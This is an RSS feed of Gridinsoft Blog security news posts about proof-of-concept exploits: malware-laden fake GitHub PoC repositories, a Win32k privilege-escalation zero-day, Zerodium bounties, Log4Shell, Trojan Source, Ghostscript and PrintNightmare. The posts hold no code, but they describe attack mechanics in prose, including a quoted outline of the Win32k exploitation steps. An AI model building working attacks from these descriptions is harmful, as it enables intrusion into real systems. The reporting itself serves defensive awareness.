PoC exploit Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/poc-exploit/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 15 Jun 2023 16:49:01 +0000 en-US hourly 1 https://wordpress.org/?v=89305 200474804 Malware in GitHub Repositories Is Spread From Fake Security Company Name https://gridinsoft.com/blogs/malware-in-github/ https://gridinsoft.com/blogs/malware-in-github/#respond Thu, 15 Jun 2023 11:53:55 +0000 https://gridinsoft.com/blogs/?p=15326 Researchers detected fake company accounts on GitHub linked to a deceitful cybersecurity company. These accounts are promoting harmful repositories on the code hosting service. According to the experts, all repositories claim a proof-of-concept (PoC) exploit for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange. Though in fact, that was a yet another example… Continue reading Malware in GitHub Repositories Is Spread From Fake Security Company Name

The post Malware in GitHub Repositories Is Spread From Fake Security Company Name appeared first on Gridinsoft Blog.

]]>
Researchers detected fake company accounts on GitHub linked to a deceitful cybersecurity company. These accounts are promoting harmful repositories on the code hosting service. According to the experts, all repositories claim a proof-of-concept (PoC) exploit for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange. Though in fact, that was a yet another example of malware in GitHub.

What is GitHub?

GitHub is a massive platform for hosting code. Researchers worldwide use it to share PoC exploits with the information security community. This helps others test patches and determine the scale and impact of bugs. Last year, there were 10 million occurrences of secrets being exposed on GitHub, a 67% increase from the previous year.

Fake Security Company Spreads Malware in GitHub

A team of VulnCheck experts is closely monitoring a large number of GitHub repositories as part of an Exploit Intelligence offering. During a routine check in early May, researchers discovered a malicious repository on GitHub that claimed to be Signal 0-day. Then it was removed. The next day, an almost identical repository was discovered under a different account, this time claiming to be WhatsApp Zero Day. But it, too, was deleted by the GitHub team. This process continued for a month.

After that, the attackers created a whole network of accounts, including half a dozen GitHub accounts and several related Twitter accounts. These accounts pretend to be part of a defunct security company called High Sierra Cyber Security. Here is an example of one such account:

Fake Security Company Spreads Malware in GitHub
The GitHub account of fake security researcher

According to technical engineers, threat actors now use code repositories to trick unaware developers into doing their work for them. These actors have focused on social engineering tactics to make the repository owner appear legitimate, but their malware on Github is quite easy to identify. Since there’s plenty of room for improvement, these attacks may become much more effective.

While very unlikely, on some levels it looks like part of a research project. But it underscores what has become very obvious with public repositories: always, always check the code you upload for your projects. That’s it.experts

All the repositories have a straightforward structure depicted in the image below. Additionally, they use the “hot” CVE tagging to entice potential victims.

Fake Security Company Spreads Malware in GitHub
Repositories of fake security account on GitHub

How it works?

The code in poc.py downloads a harmful binary and runs it. The Python script will download a particular payload based on the target’s operating system. This Discord “0-day” exploit utilizes the code mentioned above to carry out these tasks.

Afterward, poc.py obtains one of two zip files from GitHub: cveslinux.zip or cveswindows.zip. The program unzips the file, saves it to the computer’s disk, and then runs it. However, the Windows binary has a high detection rate on VirusTotal (43/71). In contrast, the Linux binary has a lower detection rate (3/62) but does contain some strings that suggest its purpose.

Conclusions:

An attacker has put much effort into creating fake identities to spread obvious malware in GitHub. They may have been successful, but since they continue to use this method, they must think it will work. It needs to be clarified if this is an individual with too much free time or a more advanced campaign like the one discovered by Google TAG in January 2021.

Regardless, security researchers should be aware that they are attractive targets for cybercriminals and should exercise caution when downloading code from GitHub. Constantly scrutinize the code you’re about to execute and avoid using anything you don’t understand. Use virtual or dedicated machines on which you do not risk losing your data. There, precautions are never excessive, especially considering the severity of malware on GitHub.

Your security may have been compromised if you’ve interacted with any of the accounts listed:

GitHub Accounts

Malicious Repositories

Twitter Accounts

The post Malware in GitHub Repositories Is Spread From Fake Security Company Name appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/malware-in-github/feed/ 0 15326
0-day vulnerability remained unpatched for 2 years due to Microsoft bug bounty issues https://gridinsoft.com/blogs/0-day-vulnerability-in-microsoft-remained-unpatched-for-2-years/ https://gridinsoft.com/blogs/0-day-vulnerability-in-microsoft-remained-unpatched-for-2-years/#respond Tue, 01 Feb 2022 21:33:45 +0000 https://gridinsoft.com/blogs/?p=7017 As part of January Patch Tuesday, Microsoft fixed a dangerous 0-day privilege escalation vulnerability for which a PoC exploit is available online. The vulnerability is already being exploited in attacks by highly skilled hacker groups. The exploit was published by Privacy Piiano founder and CEO Gil Dabah, who discovered the vulnerability two years ago. Daba… Continue reading 0-day vulnerability remained unpatched for 2 years due to Microsoft bug bounty issues

The post 0-day vulnerability remained unpatched for 2 years due to Microsoft bug bounty issues appeared first on Gridinsoft Blog.

]]>
As part of January Patch Tuesday, Microsoft fixed a dangerous 0-day privilege escalation vulnerability for which a PoC exploit is available online.

The vulnerability is already being exploited in attacks by highly skilled hacker groups.

The exploit was published by Privacy Piiano founder and CEO Gil Dabah, who discovered the vulnerability two years ago.

Daba said he chose not to report his discovery to Microsoft because it was very difficult to get money through its vulnerability bounty program.

Found it two years ago. Not recently. That’s the point. The reason I didn’t reveal it is because I waited a very long time for Microsoft to pay me for another find. By the time they finally paid, the fee had dwindled to almost nothing. I was already busy with my startup, and the vulnerability remained unpatched.the researcher said

The vulnerability, identified as CVE-2022-21882, could allow aт attacker to elevate his privileges on the local system.

A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver.Microsoft explained in it’s advisory, part of January’s Patch Tuesday updates.

Microsoft mentioned RyeLv as the researcher who discovered the vulnerability. The researcher submitted his description of the input type mismatch vulnerability in Win32k.sys on January 13, 2022.

An attacker could tell the corresponding GUI API in user mode to make a kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc. These kernel functions will cause xxxClientAllocWindowClassExtraBytes to be returned. An attacker can intercept this return by capturing xxxClientAllocWindowClassExtraBytes in the KernelCallbackTable and using the NtUserConsoleControl method to set the ConsoleWindow flag on the tagWND object, which will modify the window type.RyeLv explained.

Investment in the program was also the top recommendation of RyeLv’s technical analysis for Microsoft. He told how to “kill the bug class”:

Improve the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.

Let me remind you that we also wrote that Zerodium offers up to $400,000 for exploits for Microsoft Outlook, and also that Google recruits a team of experts to find bugs in Android applications.

The post 0-day vulnerability remained unpatched for 2 years due to Microsoft bug bounty issues appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-vulnerability-in-microsoft-remained-unpatched-for-2-years/feed/ 0 7017
Zerodium offers up to $400,000 for exploits for Microsoft Outlook https://gridinsoft.com/blogs/zerodium-offers-up-to-400000-for-exploits-for-microsoft-outlook/ https://gridinsoft.com/blogs/zerodium-offers-up-to-400000-for-exploits-for-microsoft-outlook/#respond Fri, 28 Jan 2022 21:31:13 +0000 https://gridinsoft.com/blogs/?p=7007 Well-known exploit and vulnerability broker Zerodium announced that it is ready to pay up to $400,000 for zero-day vulnerabilities and exploits that will allow remote code execution in the Microsoft Outlook email client. Previously, the maximum payout was $250,000. For similar bugs in Mozilla Thunderbird, the company is willing to pay up to $200,000. Let… Continue reading Zerodium offers up to $400,000 for exploits for Microsoft Outlook

The post Zerodium offers up to $400,000 for exploits for Microsoft Outlook appeared first on Gridinsoft Blog.

]]>
Well-known exploit and vulnerability broker Zerodium announced that it is ready to pay up to $400,000 for zero-day vulnerabilities and exploits that will allow remote code execution in the Microsoft Outlook email client.

Previously, the maximum payout was $250,000. For similar bugs in Mozilla Thunderbird, the company is willing to pay up to $200,000.

Let me remind you that the Zerodium company, founded in 2015, has been buying up exploits for various zero-day vulnerabilities for a long time, in order to then resell them to governments and law enforcement agencies around the world. To do this, the company has its own bug bounty program, in which researchers can sell exploits for up to $2.5 million (depending on the type and nature of the bug).

In addition, from time to time the company holds “bug-fixing” campaigns, during which it buys exploits for a particular software at special prices. Previously, similar promotions were held for Pidgin, WordPress, hypervisors, popular VPN products, and so on.

Rewards for bugs in Mozilla Thunderbird and Microsoft Outlook have also been temporarily increased, the company said on Twitter.

We’re currently paying up to $200,000 per exploit for Mozilla Thunderbird RCEs. We’re also (temporarily) increasing our bounty for MS Outlook RCEs to $400,000 (from $250,000).sZerodium representatives wrote.

Zerodium does not specify which platform the exploits should target, but both email clients have versions for all three major operating systems—Windows, macOS, and Linux.

Many information security experts noted that a successful hack into either of the two email clients would give the attacker access not only to the user’s computer, but also to all mailboxes managed through the compromised client. Since account passwords can be extracted from the client, this also means that the party using the exploit will later be able to access cloud accounts.

You might also be interested to read that Researchers noticed that the darknet is discussing exploits as a service, and that a PoC exploit was published for fresh vulnerability in Ghostscript.

The post Zerodium offers up to $400,000 for exploits for Microsoft Outlook appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/zerodium-offers-up-to-400000-for-exploits-for-microsoft-outlook/feed/ 0 7007
0-day In Log4j Library Poses A Threat To Many Applications & Servers https://gridinsoft.com/blogs/0-day-in-log4j-library/ https://gridinsoft.com/blogs/0-day-in-log4j-library/#respond Fri, 10 Dec 2021 19:38:13 +0000 https://gridinsoft.com/blogs/?p=6642 The Apache Software Foundation has released an emergency security update that fixes a 0-day vulnerability (CVE-2021-44228) in the popular Log4j logging library, which is part of the Apache Logging Project. The patch was released as part of the 2.15.0 release. The vulnerability was named Log4Shell and scored 10 out of 10 points on the CVSS… Continue reading 0-day In Log4j Library Poses A Threat To Many Applications & Servers

The post 0-day In Log4j Library Poses A Threat To Many Applications & Servers appeared first on Gridinsoft Blog.

]]>
The Apache Software Foundation has released an emergency security update that fixes a 0-day vulnerability (CVE-2021-44228) in the popular Log4j logging library, which is part of the Apache Logging Project.

The patch was released as part of the 2.15.0 release.

The vulnerability was named Log4Shell and scored 10 out of 10 points on the CVSS vulnerability rating scale. The bug allows remote arbitrary code execution (RCE). Yesterday’s information security researcher aggravated the problem, p0rz9 published a PoC exploit on Twitter, and the vulnerability can be exploited remotely, and this does not require special technical skills.

The vulnerability forces Java-based applications and servers that use the Log4j library to log a specific line to their internal systems. When an application or server processes such logs, a string can cause the vulnerable system to load and run a malicious script from the attacker’s controlled domain, the result will be a complete hijacking of the vulnerable application or server.LunaSec specialists describe how Log4Shell works.

The problem was originally discovered while searching for bugs on Minecraft servers, but Log4j is present in almost all corporate applications and Java servers. For example, the library can be found in almost all enterprise products the Apache Software Foundation released, including Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo, and so on. Log4j is also actively used in various open-source projects, including Redis, ElasticSearch, Elastic Logstash, Ghidra, and others.

Thus, companies using any of these products are also indirectly vulnerable to attacks on Log4Shell, but may even know about it. Information security specialists already report that solutions of giants like Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase, and probably thousands of other companies may be vulnerable to Log4Shell.

p0rz9 wrote that CVE-2021-44228 could only be exploited if the log4j2.formatMsgNoLookups parameter is set to false. KnownSec 404 Team reports that Log4j 2.15.0 has set this parameter to true to prevent attacks. Log4j users who have upgraded to version 2.15.0 and then set the flag to false will again be vulnerable to attacks.

Moreover, Log4j users who have not updated, but have set the flag to true, will still be able to block attacks even on older versions.

Unfortunately, this also means that all older versions are at risk, where this parameter is set to false by default. That is, all previous releases of Log4j, starting with 2.10.0, are vulnerable.

According to experts from Bad Packets and Greynoise, several cybercriminals are already scanning the network in search of applications that may be vulnerable to Log4Shell, which means that there is almost no time left to install patches.

Let me remind you that I also talked about the fact that the IIS bug with worm potential poses a threat to WinRM servers.

The post 0-day In Log4j Library Poses A Threat To Many Applications & Servers appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-in-log4j-library/feed/ 0 6642
Trojan Source attack is dangerous for compilers of most programming languages https://gridinsoft.com/blogs/trojan-source-attack/ https://gridinsoft.com/blogs/trojan-source-attack/#respond Fri, 05 Nov 2021 16:11:00 +0000 https://blog.gridinsoft.com/?p=6086 Scientists at the University of Cambridge, Ross Anderson and Nicholas Boucher, have published information about the Trojan Source attack concept (CVE-2021-42574), which can be used to inject malicious code into legitimate applications through comment fields. The PoC exploit is already available on GitHub. The attack is based on the use of bidirectional control characters in… Continue reading Trojan Source attack is dangerous for compilers of most programming languages

The post Trojan Source attack is dangerous for compilers of most programming languages appeared first on Gridinsoft Blog.

]]>
Scientists at the University of Cambridge, Ross Anderson and Nicholas Boucher, have published information about the Trojan Source attack concept (CVE-2021-42574), which can be used to inject malicious code into legitimate applications through comment fields. The PoC exploit is already available on GitHub.

The attack is based on the use of bidirectional control characters in source code comments. Such characters, known as BiDi (“bidirectional”), are Unicode control characters that are used within a text string to signal the transition from LTR (left to right) to RTL (right to left) mode and vice versa.

In practice, these characters are used exclusively for software applications and are invisible to humans, since they are only used to embed text with a different reading direction in large blocks of text (for example, to insert lines in Arabic or Hebrew).

Researchers have found that most compilers and code editors have no protocols for handling BiDi symbols or signalling their presence in source comments.

According to experts, attackers can insert BiDi control characters into comments that people cannot see, and upon compilation, they will move text from the comment field into executable code or move code in comments, thereby exposing applications to attacks and bypassing security checks.

Trojan Source Attack

We have verified that this attack works against C, C++, C#, JavaScript, Java, Rust, Go and Python, and we suspect that it will work against most modern languages.the researchers write.

In addition to compilers, several code editors and hosting services, as listed in the table below, are also reported to be affected.

Trojan Source Attack

In addition, according to experts, source code compilers are vulnerable to another problem (CVE-2021-42694) related to homoglyphs. During such attacks, classic Latin letters are replaced with similar characters from other alphabets.

The researchers write that the second attack can be used to create two different functions that look the same to the human eye but are actually different. Anderson and Boucher claim that in this way, an attacker can covertly add malicious code to a project.

Trojan Source Attack

The researchers summarize that compilers and editors should detect bidirectional control characters and homoglyphs and be sure to communicate them to people. So far, however, only the developers behind the official Rust compiler have released the update.

Let me remind you that I also wrote that Expert hacked 70% of Wi-Fi networks in Tel Aviv for research.

The post Trojan Source attack is dangerous for compilers of most programming languages appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-source-attack/feed/ 0 6086
PoC exploit published for fresh vulnerability in Ghostscript https://gridinsoft.com/blogs/poc-exploit-published-for-fresh-vulnerability-in-ghostscript/ https://gridinsoft.com/blogs/poc-exploit-published-for-fresh-vulnerability-in-ghostscript/#respond Fri, 10 Sep 2021 20:13:04 +0000 https://blog.gridinsoft.com/?p=5914 A PoC exploit for a fresh vulnerability in Ghostscript was presented this week. The issue endangers all servers using this component. The exploit was published by a Vietnamese information security specialist who is known online under the pseudonym Nguyen The Duc. The code is already available on GitHub, and the effectiveness of the exploit has… Continue reading PoC exploit published for fresh vulnerability in Ghostscript

The post PoC exploit published for fresh vulnerability in Ghostscript appeared first on Gridinsoft Blog.

]]>
A PoC exploit for a fresh vulnerability in Ghostscript was presented this week. The issue endangers all servers using this component.

The exploit was published by a Vietnamese information security specialist who is known online under the pseudonym Nguyen The Duc. The code is already available on GitHub, and the effectiveness of the exploit has been confirmed by several leading researchers.

Ghostscript, which dates back to 1988, is a small library that allows applications to process PDF documents and PostScript-based files. While Ghostscript is primarily used in desktop software, it is also used on the server side as it is often included in image converting and file uploading toolkits such as ImageMagick.

The exploit introduced this week allows an attacker to download a malformed SVG file that escapes the image processor and runs malicious code on the underlying OS.

Interestingly, the vulnerability for which the exploit was created was not discovered by Nguyen The Duc. The credit goes to Emil Lerner, CTO and founder of Wunderfund, who found the bug last year and used it to get rewards from companies like Airbnb, Dropbox and Yandex. Details of the vulnerability went public last month after Lerner gave a talk at the ZeroNight conference.

Here’re slides from my talk at ZeroNights X! A 0-day for GhostScript 9.50, RCE exploit chain for ImageMagick with the default settings from Ubuntu repos and several bug bounty stories inside.Emil Lerner wrote on Twitter.

Additionally, the researcher shared a link to his presentation.

The Record reports that there is still no patch for this vulnerability, moreover, the Artifex company, which is behind the development of Ghostscript, reported that no one had officially notified it about this problem. The company said that it is “more and more frustrated with cybersecurity researchers who neglect the ethical disclosure of potentially dangerous security vulnerabilities,” and promised to release a fix as soon as possible.

Let me remind you that we also admitted that the GitHub Developers Review Exploit Posting Policy Due to Recent Scandal.

The post PoC exploit published for fresh vulnerability in Ghostscript appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/poc-exploit-published-for-fresh-vulnerability-in-ghostscript/feed/ 0 5914
Unofficial patch published for PrintNightmare vulnerability https://gridinsoft.com/blogs/patch-published-for-printnightmare/ https://gridinsoft.com/blogs/patch-published-for-printnightmare/#respond Mon, 05 Jul 2021 16:12:31 +0000 https://blog.gridinsoft.com/?p=5672 Last week I talked about a PoC exploit for the dangerous vulnerability CVE-2021-34527 in Windows Print Spooler (spoolsv.exe), which researchers named PrintNightmare, and now an unofficial patch for this problem has been published. When the exploit was published, the researchers found that the patch released in June did not completely fix the problem. Moreover, the… Continue reading Unofficial patch published for PrintNightmare vulnerability

The post Unofficial patch published for PrintNightmare vulnerability appeared first on Gridinsoft Blog.

]]>
Last week I talked about a PoC exploit for the dangerous vulnerability CVE-2021-34527 in Windows Print Spooler (spoolsv.exe), which researchers named PrintNightmare, and now an unofficial patch for this problem has been published.

When the exploit was published, the researchers found that the patch released in June did not completely fix the problem. Moreover, the publication of the exploit has left many researchers confused, and some have suggested that PrintNightmare is a standalone zero-day vulnerability that needs its own fix.

For example, Mitya Kolsek, head of Acros Security and co-founder of 0Patch, wrote about this on Twitter.

Before this gets too confusing: PrintNightmare is NOT the same as CVE-2021-1675. CVE-2021-1675: Fixed in June updates. PrintNightmare: 0day”, Mitja Kolsek wrote on his Twitter.

The problem affects all versions of Windows, can even affect XP and Vista, and helps remotely execute arbitrary code with SYSTEM privileges, which allows an attacker to install programs, view, modify or delete data, and create new accounts with user rights.

There is no patch for this vulnerability yet, and Microsoft experts reported that the problem is already being exploited in real life, although the company did not specify whether this is being done by cybercriminals or information security researchers.

Microsoft engineers offered administrators several solutions to the problem. For example, it is recommended to disable Print Spooler completely by blocking printing locally and remotely. It is also possible to disable incoming remote printing through Group Policy, which will block the main vector of potential attacks. In the second case, “the system will no longer function as a print server, but local printing from directly connected devices will still be possible.”

Now a third option has appeared: the experts involved in the development of the 0patch solution have prepared temporary patches (or micro-patches) for this problem. Let me remind you that 0patch is a platform designed just for such situations, that is, fixing 0-day and other unpatched vulnerabilities, to support products that are no longer supported by manufacturers, custom software, and so on.

Micropatches are available for Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2008 R2, as well as Windows 10 v20H2, Windows 10 v2004, and Windows 10 v1909.

The post Unofficial patch published for PrintNightmare vulnerability appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/patch-published-for-printnightmare/feed/ 0 5672